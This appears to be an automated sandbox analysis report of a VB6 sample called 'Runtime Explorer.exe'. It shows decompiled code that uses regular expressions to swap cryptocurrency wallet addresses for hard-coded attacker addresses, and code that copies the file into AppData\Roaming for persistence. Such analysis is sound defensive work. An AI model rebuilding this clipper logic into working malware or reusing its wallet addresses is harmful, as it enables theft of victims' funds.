              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$LateMove$EachVarg$#617#712#716CallNextNofreeUnlock
              • String ID: Execute$Global$IgnoreCase$Pattern$VBScript.RegExp$qp0e0fdtxzgklu4um995qux0w5wep4mjwgcflz246z$qq75exaak2c70jxh3pjf7ll82x33a8gk0udetm5x6n$qzatfelqp8ymsjchwwv57ckultvjsytwv5608qncdk
              • API String ID: 3083996531-1106001032
              • Opcode ID: 8dbdfaf1e005c241f7213055b92d1c62d08d538fbbbd43146cdfe124474290e2
              • Instruction ID: 7ce5d415431a14433d6b44caf41925242031a9b194db50f7bcad967bc9c8ff0c
              • Opcode Fuzzy Hash: 8dbdfaf1e005c241f7213055b92d1c62d08d538fbbbd43146cdfe124474290e2
              • Instruction Fuzzy Hash: 68812DB1D00218AADB10EFE6CD81EDEB7BCBB09304F60427FA509B7191DB785A498F55
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 37%
              			E00416178(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				char _v88;
				char _v104;
				signed int _v120;
				signed int _v128;
				char _v136;
				signed int _v152;
				intOrPtr _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v212;
				char* _t85;
				char* _t92;
				char* _t93;
				char* _t97;
				char* _t99;
				char* _t131;
				intOrPtr _t140;

				_push(0x401256);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t140;
				_v12 = _t140 - 0xc0;
				_v8 = 0x4011f8;
				_push(0);
				_push(L"VBScript.RegExp");
				_push( &_v104);
				_v36 = 0;
				_v52 = 0;
				_v68 = 0;
				_v84 = 0;
				_v88 = 0;
				_v104 = 0;
				_v120 = 0;
				_v136 = 0;
				_v152 = 0;
				_v176 = 0;
				_v180 = 0;
				_v184 = 0;
				_v188 = 0;
				L004012F2();
				_push( &_v104);
				_push( &_v52);
				L004013EE();
				L004013E2();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Pattern");
				_push( &_v52);
				asm("movsd");
				L004013E8();
				_v128 = _v128 | 0xffffffff;
				_v136 = 0xb;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"IgnoreCase");
				_push( &_v52);
				asm("movsd");
				L004013E8();
				_v128 = _v128 | 0xffffffff;
				_v136 = 0xb;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Global");
				_push( &_v52);
				asm("movsd");
				L004013E8();
				_v128 = 0;
				_v136 = 2;
				L004013DC();
				_push( &_v212);
				L004013D0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t131 = 1;
				_push(_t131);
				_push(L"Execute");
				_push( &_v52);
				_t85 =  &_v104;
				_push(_t85);
				L004013D6();
				_push(_t85);
				_push( &_v84);
				L004013EE();
				_push( &_v84);
				_push( &_v68);
				_push( &_v176);
				_push( &_v184);
				_push( &_v188);
				_t92 =  &_v180;
				_push(_t92);
				L004013CA();
				while(_t92 != 0) {
					_push(5);
					_push( &_v68);
					_push( &_v104);
					L004013A6();
					_v128 = L"DdzFF";
					_push( &_v104);
					_t97 =  &_v136;
					_push(_t97);
					_v136 = 0x8008;
					L00401346();
					_v172 = _t97;
					L00401352();
					_push(0);
					_push(0xffffffff);
					_push(_t131);
					if(_v172 == 0) {
						_push(L"addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye");
					} else {
						_push(L"DdzFFzCqrht7BN8PewS7jjUnzZtFEfwaP54K5qPmq9yGbZ59JuJgpTrCSRdCdZULEAo5vRVPXLstBpsFXDpHVD8peY9ESdd77GFzsF6D");
					}
					_push( &_v68);
					_t57 =  &_v88; // 0x41745b
					_t99 = _t57;
					_push(_t99);
					L0040139A();
					_push(_t99);
					_push( *0x419028);
					L004013A0();
					L0040136A();
					L0040135E();
					_v128 = _t131;
					_push( &_v36);
					_push( &_v136);
					_push( &_v104);
					_v136 = 2;
					L004013C4();
					L004013DC();
					_push( &_v68);
					_push( &_v176);
					_push( &_v184);
					_push( &_v188);
					_t92 =  &_v180;
					_push(_t92);
					L004013BE();
				}
				_push(0x416435);
				_t93 =  &_v180;
				_push(_t93);
				L004013AC();
				L0040132E();
				L00401352();
				L00401352();
				L00401352();
				L00401352();
				return _t93;
			}




























              0x0041617d
              0x00416188
              0x00416189
              0x00416199
              0x0041619c
              0x004161a8
              0x004161a9
              0x004161ae
              0x004161af
              0x004161b2
              0x004161b5
              0x004161b8
              0x004161bb
              0x004161be
              0x004161c1
              0x004161c4
              0x004161ca
              0x004161d0
              0x004161d6
              0x004161dc
              0x004161e2
              0x004161e8
              0x004161f0
              0x004161f4
              0x004161f5
              0x00416203
              0x00416212
              0x00416213
              0x00416214
              0x00416215
              0x0041621a
              0x0041621b
              0x0041621c
              0x00416221
              0x00416230
              0x0041623d
              0x0041623e
              0x0041623f
              0x00416240
              0x00416245
              0x00416246
              0x00416247
              0x0041624c
              0x0041625b
              0x00416268
              0x00416269
              0x0041626a
              0x0041626b
              0x00416270
              0x00416271
              0x00416272
              0x00416280
              0x00416283
              0x0041628d
              0x0041629b
              0x0041629c
              0x004162a8
              0x004162a9
              0x004162aa
              0x004162ab
              0x004162b1
              0x004162b2
              0x004162b3
              0x004162b8
              0x004162b9
              0x004162bc
              0x004162bd
              0x004162c5
              0x004162c9
              0x004162ca
              0x004162d2
              0x004162d6
              0x004162dd
              0x004162e4
              0x004162eb
              0x004162ec
              0x004162f2
              0x004162f3
              0x004162fd
              0x00416308
              0x0041630a
              0x0041630e
              0x0041630f
              0x00416317
              0x0041631e
              0x0041631f
              0x00416325
              0x00416326
              0x00416330
              0x00416338
              0x0041633e
              0x0041634a
              0x0041634b
              0x0041634d
              0x0041634e
              0x00416357
              0x00416350
              0x00416350
              0x00416350
              0x0041635f
              0x00416360
              0x00416360
              0x00416363
              0x00416364
              0x00416369
              0x0041636a
              0x00416370
              0x00416379
              0x00416381
              0x00416389
              0x0041638c
              0x00416393
              0x00416397
              0x00416398
              0x004163a2
              0x004163ac
              0x004163b4
              0x004163bb
              0x004163c2
              0x004163c9
              0x004163ca
              0x004163d0
              0x004163d1
              0x004163d1
              0x004163db
              0x004163fd
              0x00416403
              0x00416404
              0x0041640f
              0x00416417
              0x0041641f
              0x00416427
              0x0041642f
              0x00416434

              APIs
              • #716.MSVBVM60(00401256,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 004161E8
              • __vbaVarSetVar.MSVBVM60(?,00401256,00401256,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 004161F5
              • __vbaVarVargNofree.MSVBVM60(?,00401256,00401256,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416203
              • __vbaVarLateMemSt.MSVBVM60(?,Pattern,00000000,00004008,00000008,00419028), ref: 0041621C
              • __vbaVarLateMemSt.MSVBVM60(?,IgnoreCase,?,?,?,?,?,?,00000008,00419028), ref: 00416247
              • __vbaVarLateMemSt.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416272
              • __vbaVarMove.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 0041628D
              • __vbaVargVar.MSVBVM60(?,?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 0041629C
              • __vbaVarLateMemCallLd.MSVBVM60(00401256,?,Execute,00000001), ref: 004162BD
              • __vbaVarSetVar.MSVBVM60(?,00000000), ref: 004162CA
              • __vbaForEachVar.MSVBVM60(?,?,?,?,?,?,?,00000000), ref: 004162F3
              • #617.MSVBVM60(00401256,?,00000005,?,?,?,?,?,?,?,00000000), ref: 0041630F
              • __vbaVarTstEq.MSVBVM60(00000002,00401256,00401256,?,00000005,?,?,?,?,?,?,?,00000000), ref: 00416330
              • __vbaFreeVar.MSVBVM60(00000002,00401256,00401256,?,00000005,?,?,?,?,?,?,?,00000000), ref: 0041633E
              • __vbaStrVarVal.MSVBVM60([tA,?,addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye,00000001,000000FF,00000000,00000002,00401256,00401256,?,00000005,?,?,?,?,?), ref: 00416364
              • #712.MSVBVM60(00000000,[tA,?,addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye,00000001,000000FF,00000000,00000002,00401256,00401256,?,00000005,?,?,?,?), ref: 00416370
              • __vbaStrMove.MSVBVM60(00000000,[tA,?,addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye,00000001,000000FF,00000000,00000002,00401256,00401256,?,00000005,?,?,?,?), ref: 00416379
              • __vbaFreeStr.MSVBVM60(00000000,[tA,?,addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye,00000001,000000FF,00000000,00000002,00401256,00401256,?,00000005,?,?,?,?), ref: 00416381
              • __vbaVarAdd.MSVBVM60(00401256,00008008,?,00000000,[tA,?,addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye,00000001,000000FF,00000000,00000002,00401256,00401256,?,00000005,?), ref: 004163A2
              • __vbaVarMove.MSVBVM60(00401256,00008008,?,00000000,[tA,?,addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye,00000001,000000FF,00000000,00000002,00401256,00401256,?,00000005,?), ref: 004163AC
              • __vbaNextEachVar.MSVBVM60(?,?,?,?,?,00401256,00008008,?,00000000,[tA,?,addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye,00000001,000000FF,00000000,00000002), ref: 004163D1
              • __vbaAryUnlock.MSVBVM60(?,00416435,?,?,?,?,?,?,?,00000000), ref: 00416404
              • __vbaFreeObj.MSVBVM60(?,00416435,?,?,?,?,?,?,?,00000000), ref: 0041640F
              • __vbaFreeVar.MSVBVM60(?,00416435,?,?,?,?,?,?,?,00000000), ref: 00416417
              • __vbaFreeVar.MSVBVM60(?,00416435,?,?,?,?,?,?,?,00000000), ref: 0041641F
              • __vbaFreeVar.MSVBVM60(?,00416435,?,?,?,?,?,?,?,00000000), ref: 00416427
              • __vbaFreeVar.MSVBVM60(?,00416435,?,?,?,?,?,?,?,00000000), ref: 0041642F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$Late$Move$EachVarg$#617#712#716CallNextNofreeUnlock
              • String ID: DdzFF$DdzFFzCqrht7BN8PewS7jjUnzZtFEfwaP54K5qPmq9yGbZ59JuJgpTrCSRdCdZULEAo5vRVPXLstBpsFXDpHVD8peY9ESdd77GFzsF6D$Execute$Global$IgnoreCase$Pattern$VBScript.RegExp$[tA$addr1vyh3ysu2rl4q2llq80sptvk3hftr8xen8dc73kdc3ezlqngpqtaye
              • API String ID: 3165666924-2065352155
              • Opcode ID: 94c56d6ff753b53e10e8f38fd84770a58fd3655326989be4f30b0ee166e7d6e3
              • Instruction ID: 94245eaa7c88157d15205a62f51e8447db82719ee69417a6f39068eb3cb7788f
              • Opcode Fuzzy Hash: 94c56d6ff753b53e10e8f38fd84770a58fd3655326989be4f30b0ee166e7d6e3
              • Instruction Fuzzy Hash: 3B7107B2C0021CAADB10EFA5CD81FDEB7BDBB08304F5041ABA909F7591DB785A498F55
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 36%
              			E00416446(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				char _v88;
				char _v104;
				signed int _v112;
				char _v120;
				signed int _v136;
				char _v156;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v208;
				char* _t85;
				char* _t92;
				char* _t93;
				char* _t99;
				char* _t133;
				intOrPtr _t142;

				_push(0x401256);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t142;
				_v12 = _t142 - 0xbc;
				_v8 = 0x401208;
				_push(0);
				_push(L"VBScript.RegExp");
				_push( &_v104);
				_v36 = 0;
				_v52 = 0;
				_v68 = 0;
				_v84 = 0;
				_v88 = 0;
				_v104 = 0;
				_v120 = 0;
				_v136 = 0;
				_v156 = 0;
				_v172 = 0;
				_v176 = 0;
				_v180 = 0;
				_v184 = 0;
				L004012F2();
				_push( &_v104);
				_push( &_v52);
				L004013EE();
				L004013E2();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Pattern");
				_push( &_v52);
				asm("movsd");
				L004013E8();
				_v112 = _v112 | 0xffffffff;
				_v120 = 0xb;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"IgnoreCase");
				_push( &_v52);
				asm("movsd");
				L004013E8();
				_v112 = _v112 | 0xffffffff;
				_v120 = 0xb;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Global");
				_push( &_v52);
				asm("movsd");
				L004013E8();
				_v112 = 0;
				_v120 = 2;
				L004013DC();
				_push( &_v208);
				L004013D0();
				asm("movsd");
				asm("movsd");
				_push(1);
				asm("movsd");
				_push(L"Execute");
				_push( &_v52);
				_t85 =  &_v104;
				_push(_t85);
				asm("movsd");
				L004013D6();
				_push(_t85);
				_push( &_v84);
				L004013EE();
				_push( &_v84);
				_push( &_v68);
				_push( &_v156);
				_push( &_v180);
				_push( &_v184);
				_t92 =  &_v176;
				_push(_t92);
				L004013CA();
				_t133 = L"0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929";
				while(_t92 != 0) {
					_push(3);
					_push( &_v68);
					_push( &_v104);
					L004013A6();
					L004013DC();
					_v112 = 0x412644;
					_push( &_v172);
					_push( &_v120);
					_v120 = 0x8008;
					L00401346();
					_push(0);
					_push(0xffffffff);
					_push(1);
					_push(_t133);
					_push( &_v68);
					_t99 =  &_v88;
					_push(_t99);
					L0040139A();
					_push(_t99);
					_push( *0x419028);
					L004013A0();
					L0040136A();
					L0040135E();
					 *0x419024 =  *0x419024 | 0x0000ffff;
					_push( &_v36);
					_push( &_v120);
					_push( &_v104);
					_v112 = 1;
					_v120 = 2;
					L004013C4();
					L004013DC();
					_push( &_v68);
					_push( &_v156);
					_push( &_v180);
					_push( &_v184);
					_t92 =  &_v176;
					_push(_t92);
					L004013BE();
				}
				_push(0x4166e8);
				_t93 =  &_v176;
				_push(_t93);
				L004013AC();
				L0040132E();
				L00401352();
				L00401352();
				L00401352();
				L00401352();
				L00401352();
				return _t93;
			}


























              0x0041644b
              0x00416456
              0x00416457
              0x00416467
              0x0041646a
              0x00416476
              0x00416477
              0x0041647c
              0x0041647d
              0x00416480
              0x00416483
              0x00416486
              0x00416489
              0x0041648c
              0x0041648f
              0x00416492
              0x00416498
              0x0041649e
              0x004164a4
              0x004164aa
              0x004164b0
              0x004164b6
              0x004164be
              0x004164c2
              0x004164c3
              0x004164d1
              0x004164e0
              0x004164e1
              0x004164e2
              0x004164e3
              0x004164e8
              0x004164e9
              0x004164ea
              0x004164ef
              0x004164fb
              0x00416505
              0x00416506
              0x00416507
              0x00416508
              0x0041650d
              0x0041650e
              0x0041650f
              0x00416514
              0x00416520
              0x0041652a
              0x0041652b
              0x0041652c
              0x0041652d
              0x00416532
              0x00416533
              0x00416534
              0x0041653f
              0x00416542
              0x00416549
              0x00416557
              0x00416558
              0x00416564
              0x00416565
              0x00416566
              0x0041656b
              0x0041656c
              0x00416571
              0x00416572
              0x00416575
              0x00416576
              0x00416577
              0x0041657f
              0x00416583
              0x00416584
              0x0041658c
              0x00416590
              0x00416597
              0x0041659e
              0x004165a5
              0x004165a6
              0x004165ac
              0x004165ad
              0x004165b2
              0x004165bc
              0x004165c7
              0x004165c9
              0x004165cd
              0x004165ce
              0x004165dc
              0x004165e7
              0x004165ee
              0x004165f2
              0x004165f3
              0x004165fa
              0x004165ff
              0x00416600
              0x00416605
              0x0041660a
              0x0041660b
              0x0041660c
              0x0041660f
              0x00416610
              0x00416615
              0x00416616
              0x0041661c
              0x00416625
              0x0041662d
              0x00416635
              0x0041663d
              0x00416641
              0x00416645
              0x00416646
              0x0041664d
              0x00416654
              0x0041665e
              0x00416666
              0x0041666d
              0x00416674
              0x0041667b
              0x0041667c
              0x00416682
              0x00416683
              0x00416683
              0x0041668d
              0x004166a5
              0x004166ab
              0x004166ac
              0x004166b7
              0x004166c2
              0x004166ca
              0x004166d2
              0x004166da
              0x004166e2
              0x004166e7

              APIs
              • #716.MSVBVM60(?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 004164B6
              • __vbaVarSetVar.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 004164C3
              • __vbaVarVargNofree.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 004164D1
              • __vbaVarLateMemSt.MSVBVM60(?,Pattern,00000000,00004008,00000008,00419028), ref: 004164EA
              • __vbaVarLateMemSt.MSVBVM60(?,IgnoreCase,?,?,?,?,?,?,00000008,00419028), ref: 0041650F
              • __vbaVarLateMemSt.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416534
              • __vbaVarMove.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416549
              • __vbaVargVar.MSVBVM60(?,?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416558
              • __vbaVarLateMemCallLd.MSVBVM60(?,?,Execute,00000001), ref: 00416577
              • __vbaVarSetVar.MSVBVM60(?,00000000), ref: 00416584
              • __vbaForEachVar.MSVBVM60(?,?,?,?,?,?,?,00000000), ref: 004165AD
              • #617.MSVBVM60(?,?,00000003,?,?,?,?,?,?,?,00000000), ref: 004165CE
              • __vbaVarMove.MSVBVM60(?,?,00000003,?,?,?,?,?,?,?,00000000), ref: 004165DC
              • __vbaVarTstEq.MSVBVM60(00000002,?,?,?,00000003,?,?,?,?,?,?,?,00000000), ref: 004165FA
              • __vbaStrVarVal.MSVBVM60(?,?,0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929,00000001,000000FF,00000000,00000002,?,?,?,00000003,?,?,?,?,?), ref: 00416610
              • #712.MSVBVM60(00000000,?,?,0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929,00000001,000000FF,00000000,00000002,?,?,?,00000003,?,?,?,?), ref: 0041661C
              • __vbaStrMove.MSVBVM60(00000000,?,?,0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929,00000001,000000FF,00000000,00000002,?,?,?,00000003,?,?,?,?), ref: 00416625
              • __vbaFreeStr.MSVBVM60(00000000,?,?,0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929,00000001,000000FF,00000000,00000002,?,?,?,00000003,?,?,?,?), ref: 0041662D
              • __vbaVarAdd.MSVBVM60(?,00008008,?,00000000,?,?,0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929,00000001,000000FF,00000000,00000002,?,?,?,00000003,?), ref: 00416654
              • __vbaVarMove.MSVBVM60(?,00008008,?,00000000,?,?,0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929,00000001,000000FF,00000000,00000002,?,?,?,00000003,?), ref: 0041665E
              • __vbaNextEachVar.MSVBVM60(?,?,?,?,?,?,00008008,?,00000000,?,?,0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929,00000001,000000FF,00000000,00000002), ref: 00416683
              • __vbaAryUnlock.MSVBVM60(?,004166E8,?,?,?,?,?,?,?,00000000), ref: 004166AC
              • __vbaFreeObj.MSVBVM60(?,004166E8,?,?,?,?,?,?,?,00000000), ref: 004166B7
              • __vbaFreeVar.MSVBVM60(?,004166E8,?,?,?,?,?,?,?,00000000), ref: 004166C2
              • __vbaFreeVar.MSVBVM60(?,004166E8,?,?,?,?,?,?,?,00000000), ref: 004166CA
              • __vbaFreeVar.MSVBVM60(?,004166E8,?,?,?,?,?,?,?,00000000), ref: 004166D2
              • __vbaFreeVar.MSVBVM60(?,004166E8,?,?,?,?,?,?,?,00000000), ref: 004166DA
              • __vbaFreeVar.MSVBVM60(?,004166E8,?,?,?,?,?,?,?,00000000), ref: 004166E2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$LateMove$EachVarg$#617#712#716CallNextNofreeUnlock
              • String ID: 0x0$0xC4eABEc8CCb1db4db76A2CA716B03D0ae7b8d929$Execute$Global$IgnoreCase$Pattern$VBScript.RegExp
              • API String ID: 3083996531-1087463468
              • Opcode ID: 9560e0b29269f3875ba8a432f49936d4ac5360cc206d81ed3f8be69714d4ff85
              • Instruction ID: 437b0ff55e8cfd2a6056939db9a860d7f5bca778b1d29b0faffde707b7e6d408
              • Opcode Fuzzy Hash: 9560e0b29269f3875ba8a432f49936d4ac5360cc206d81ed3f8be69714d4ff85
              • Instruction Fuzzy Hash: D3710972C00218AADB10EFA6CD81EDEB7BCBB09304F50427FE909B7591DB785A498F55
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 36%
              			E004132DF(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char _v28;
				char _v32;
				void* _v36;
				char _v52;
				char _v68;
				intOrPtr _v76;
				char _v84;
				char _v100;
				intOrPtr _v108;
				char _v116;
				char* _v124;
				char _v132;
				char _v172;
				intOrPtr _v180;
				char* _t53;
				void* _t56;
				intOrPtr* _t57;
				intOrPtr _t58;
				char* _t60;
				char* _t70;
				char* _t85;
				intOrPtr* _t90;
				intOrPtr* _t91;
				char _t92;
				intOrPtr _t98;
				intOrPtr _t105;

				_push(0x401256);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t98;
				_v12 = _t98 - 0xc4;
				_v8 = 0x4011b8;
				_push(0);
				_push(L"scripting.filesystemobject");
				_push( &_v52);
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v52 = 0;
				_v68 = 0;
				_v84 = 0;
				_v100 = 0;
				_v116 = 0;
				_v132 = 0;
				L004012F2();
				_t53 =  &_v52;
				_push(_t53);
				L00401382();
				_push(_t53);
				_push( &_v24);
				L00401388();
				L00401352();
				_t105 =  *0x4193b8; // 0x211e8f4
				if(_t105 == 0) {
					_push(0x4193b8);
					_push(0x411cb4);
					L0040131C();
				}
				_t90 =  *0x4193b8; // 0x211e8f4
				_t56 =  *((intOrPtr*)( *_t90 + 0x14))(_t90,  &_v36);
				asm("fclex");
				if(_t56 < 0) {
					_push(0x14);
					_push(0x411ca4);
					_push(_t90);
					_push(_t56);
					L00401322();
				}
				_t57 = _v36;
				_t91 = _t57;
				_t58 =  *((intOrPtr*)( *_t57 + 0x50))(_t57,  &_v28);
				asm("fclex");
				if(_t58 < 0) {
					_push(0x50);
					_push(0x411d5c);
					_push(_t91);
					_push(_t58);
					L00401322();
				}
				_push(_v28);
				_push(0x411d70);
				L00401364();
				L0040136A();
				_t85 = L"Runtime Explorer.exe";
				_push(_t58);
				_push(_t85);
				L00401364();
				_t92 = 8;
				_v108 = _t58;
				_v116 = _t92;
				_v124 = L"USERPROFILE";
				_v132 = _t92;
				L00401376();
				_push( &_v52);
				_t60 =  &_v68;
				_push(_t60);
				L004012FE();
				_push(L"\\AppData\\Roaming\\");
				_push(_t85);
				L00401364();
				_v84 = _t92;
				asm("movsd");
				_v76 = _t60;
				asm("movsd");
				_push( &_v68);
				asm("movsd");
				_push( &_v84);
				_push( &_v100);
				_v172 = 0;
				_v180 = 0xb;
				asm("movsd");
				L00401304();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(3);
				_push(L"copyfile");
				_push(_v24);
				asm("movsd");
				L004012EC();
				_push( &_v32);
				_push( &_v28);
				_push(2);
				L004012E0();
				L0040132E();
				_push( &_v100);
				_push( &_v116);
				_push( &_v84);
				_push( &_v68);
				_t70 =  &_v52;
				_push(_t70);
				_push(5);
				L00401370();
				_push(0x4134e8);
				L0040132E();
				return _t70;
			}
































              0x004132e4
              0x004132ef
              0x004132f0
              0x00413300
              0x00413303
              0x0041330f
              0x00413310
              0x00413315
              0x00413316
              0x00413319
              0x0041331c
              0x0041331f
              0x00413322
              0x00413325
              0x00413328
              0x0041332b
              0x0041332e
              0x00413331
              0x00413334
              0x00413339
              0x0041333c
              0x0041333d
              0x00413342
              0x00413346
              0x00413347
              0x0041334f
              0x00413354
              0x0041335a
              0x0041335c
              0x00413361
              0x00413366
              0x00413366
              0x0041336b
              0x00413378
              0x0041337d
              0x0041337f
              0x00413381
              0x00413383
              0x00413388
              0x00413389
              0x0041338a
              0x0041338a
              0x0041338f
              0x00413399
              0x0041339b
              0x004133a0
              0x004133a2
              0x004133a4
              0x004133a6
              0x004133ab
              0x004133ac
              0x004133ad
              0x004133ad
              0x004133b2
              0x004133b5
              0x004133ba
              0x004133c4
              0x004133c9
              0x004133ce
              0x004133cf
              0x004133d0
              0x004133da
              0x004133de
              0x004133e1
              0x004133e4
              0x004133eb
              0x004133ee
              0x004133f6
              0x004133f7
              0x004133fa
              0x004133fb
              0x00413400
              0x00413405
              0x00413406
              0x0041340e
              0x00413416
              0x00413417
              0x0041341d
              0x0041341e
              0x00413422
              0x00413423
              0x00413427
              0x00413428
              0x0041342e
              0x00413438
              0x00413439
              0x00413448
              0x00413449
              0x0041344a
              0x0041344b
              0x00413454
              0x00413455
              0x00413456
              0x00413457
              0x00413459
              0x0041345e
              0x00413461
              0x00413462
              0x0041346a
              0x0041346e
              0x0041346f
              0x00413471
              0x0041347c
              0x00413484
              0x00413488
              0x0041348c
              0x00413490
              0x00413491
              0x00413494
              0x00413495
              0x00413497
              0x0041349f
              0x004134e2
              0x004134e7

              APIs
              • #716.MSVBVM60(?,scripting.filesystemobject,00000000), ref: 00413334
              • __vbaObjVar.MSVBVM60(?,?,scripting.filesystemobject,00000000), ref: 0041333D
              • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,scripting.filesystemobject,00000000), ref: 00413347
              • __vbaFreeVar.MSVBVM60(?,00000000,?,?,scripting.filesystemobject,00000000), ref: 0041334F
              • __vbaNew2.MSVBVM60(00411CB4,004193B8,?,00000000,?,?,scripting.filesystemobject,00000000), ref: 00413366
              • __vbaHresultCheckObj.MSVBVM60(00000000,0211E8F4,00411CA4,00000014), ref: 0041338A
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411D5C,00000050), ref: 004133AD
              • __vbaStrCat.MSVBVM60(00411D70,?), ref: 004133BA
              • __vbaStrMove.MSVBVM60(00411D70,?), ref: 004133C4
              • __vbaStrCat.MSVBVM60(Runtime Explorer.exe,00000000,00411D70,?), ref: 004133D0
              • __vbaVarDup.MSVBVM60(Runtime Explorer.exe,00000000,00411D70,?), ref: 004133EE
              • #666.MSVBVM60(?,?,Runtime Explorer.exe,00000000,00411D70,?), ref: 004133FB
              • __vbaStrCat.MSVBVM60(Runtime Explorer.exe,\AppData\Roaming\,?,?,Runtime Explorer.exe,00000000,00411D70,?), ref: 00413406
              • __vbaVarCat.MSVBVM60(?,?,?,?), ref: 00413439
              • __vbaLateMemCall.MSVBVM60(?,copyfile,00000003), ref: 00413462
              • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,copyfile,00000003), ref: 00413471
              • __vbaFreeObj.MSVBVM60 ref: 0041347C
              • __vbaFreeVarList.MSVBVM60(00000005,?,?,?,?,?), ref: 00413497
              • __vbaFreeObj.MSVBVM60(004134E8), ref: 004134E2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$CheckHresultList$#666#716AddrefCallLateMoveNew2
              • String ID: Runtime Explorer.exe$USERPROFILE$\AppData\Roaming\$copyfile$scripting.filesystemobject
              • API String ID: 2937482936-234267195
